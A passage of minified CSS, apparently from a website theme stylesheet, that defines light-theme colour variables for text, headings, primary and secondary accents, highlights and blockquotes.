Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c